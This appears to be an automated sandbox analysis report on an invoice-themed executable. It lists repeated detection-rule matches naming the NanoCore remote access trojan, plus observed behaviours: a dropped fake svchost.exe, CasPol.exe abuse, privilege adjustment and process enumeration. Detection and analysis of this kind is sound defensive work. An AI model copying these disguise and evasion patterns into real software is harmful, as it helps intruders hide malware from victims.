Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/19@6/5

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		7_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 8_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		8_2_00408FC9

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

7_2_004095FD

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

7_2_0040A33B

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_00401306

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{5c958888-f81c-42a4-939d-31983a2cd9ba}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f

Jump to behavior

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
